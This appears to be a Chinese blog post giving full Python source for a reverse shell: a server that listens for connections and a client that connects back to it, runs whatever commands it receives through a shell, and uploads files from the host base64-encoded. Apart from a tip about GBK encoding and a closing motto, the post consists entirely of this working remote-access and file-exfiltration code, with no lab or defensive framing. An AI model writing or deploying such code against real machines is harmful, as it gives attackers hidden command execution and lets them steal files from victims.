反向Shell的服务端与客户端代码实现文件下载(二进制文件比如图片)以及命令执行,需要执行字符编码的问题
本代码非常注意的一点是,client端的subprocess.check_output方法中需要指定encoding='gbk',否则执行错误。
服务器端代码:
1 import socket 2 import json 3 import optparse 4 import threading 5 import sys 6 import base64 7 8 9 class TCPServer: 10 def __init__(self) -> None: 11 self.port = self.get_params() 12 self.server_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 13 self.server_s.setsockopt(socket.SOL_SOCKET, socket.SO_REUSEADDR, 1) 14 self.server_s.bind(('0.0.0.0',self.port)) 15 self.server_s.listen(5) 16 print("[-] Waiting for connections...") 17 18 19 def get_params(self): 20 parser = optparse.OptionParser("Usage: <Program> -p port") 21 parser.add_option('-p','--port',dest='port', type='int', help="Specify listener port") 22 options,args = parser.parse_args() 23 if options.port is None: 24 print(parser.usage) 25 sys.exit(0) 26 if options.port > 65535 or options.port < 0: 27 print("Enter valide port") 28 sys.exit(0) 29 return options.port 30 31 def reliable_send(self,client_s, data): 32 try: 33 34 client_s.send(json.dumps(data).encode('utf-8')) 35 except Exception as e: 36 print(e) 37 38 def reliable_recv(self,client_s): 39 recv_data = "" 40 while True: 41 try: 42 recv_data = recv_data + client_s.recv(1024).decode('utf-8') 43 return json.loads(recv_data) 44 except ValueError: 45 continue 46 """ 47 cd path 48 """ 49 def client_handler(self,client_s): 50 while True: 51 command = input("# ") 52 self.reliable_send(client_s, command) 53 54 if command == 'q': 55 break 56 elif command[0:8] == 'download': 57 try: 58 filename = command[9:] 59 with open(filename, 'wb') as f: 60 data = self.reliable_recv(client_s) 61 de_str_data = base64.b64decode(data) 62 f.write(de_str_data) 63 except Exception as e: 64 print(e) 65 66 else: 67 68 recv_data = self.reliable_recv(client_s) 69 print(recv_data) 70 client_s.close() 71 72 73 def run(self): 74 try: 75 while True: 76 client_s, client_addr = self.server_s.accept() 77 print('~Connected from %s' % str(client_addr)) 78 t = threading.Thread(target=self.client_handler, args=(client_s,)) 79 t.start() 80 except KeyboardInterrupt: 81 self.server_s.close() 82 print("Exit the program") 83 sys.exit(0) 84 except Exception as e: 85 print(e) 86 87 88 89 if __name__ == "__main__": 90 tcp_server = TCPServer() 91 tcp_server.run()
客户端代码:
1 import socket 2 import json 3 import optparse 4 import sys 5 import subprocess 6 import os 7 import base64 8 9 10 11 class TCPClient: 12 def __init__(self) -> None: 13 self.target = self.get_params()[0] 14 self.port = self.get_params()[1] 15 self.client_s = socket.socket(socket.AF_INET, socket.SOCK_STREAM) 16 self.client_s.connect((self.target, self.port)) 17 18 19 def get_params(self): 20 parser = optparse.OptionParser("Usage: <Program> -p port") 21 parser.add_option('-p','--port',dest='port', type='int', help="Specify server port") 22 parser.add_option('-t', '--target', dest='target', type='string', help="Specify server IP address") 23 options,args = parser.parse_args() 24 if options.port is None or options.target is None: 25 print(parser.usage) 26 sys.exit(0) 27 28 return options.target, options.port 29 30 def reliable_send(self,data): 31 self.client_s.send(json.dumps(data).encode('utf-8')) 32 33 def reliable_recv(self): 34 recv_data = "" 35 while True: 36 try: 37 recv_data = recv_data + self.client_s.recv(1024).decode('utf-8') 38 return json.loads(recv_data) 39 except ValueError: 40 continue 41 42 43 def run(self): 44 try: 45 while True: 46 recv_data = self.reliable_recv() 47 print(recv_data) 48 49 if recv_data == 'q': 50 break 51 elif recv_data[0:2] == 'cd': 52 if os.path.exists(recv_data[3:]): 53 os.chdir(recv_data[3:]) 54 command_result = "Changed directory successfully" 55 else: 56 command_result = "The file does not exist" 57 58 elif recv_data[0:8] == 'download': 59 filename = recv_data[9:] 60 if os.path.exists(filename): 61 with open(filename, 'rb') as f: 62 content = f.read() 63 content_bytes=base64.b64encode(content) 64 command_result = content_bytes.decode('ascii') 65 print(command_result) 66 else: 67 command_result = 'The file does not exist' 68 69 70 self.reliable_send(command_result) 71 else: 72 try: 73 74 command_result = subprocess.check_output(recv_data, shell=True, stderr=subprocess.STDOUT,encoding='GBK') 75 # print(command_result) 76 77 78 self.reliable_send(command_result) 79 except Exception as e: 80 print(e) 81 82 pass 83 84 self.client_s.close() 85 except Exception as e: 86 print(e) 87 command_result = 'Failed to execute' 88 self.reliable_send(command_result) 89 90 91 92 if __name__ == "__main__": 93 client = TCPClient() 94 client.run()
STRIVE FOR PROGRESS,NOT FOR PERFECTION
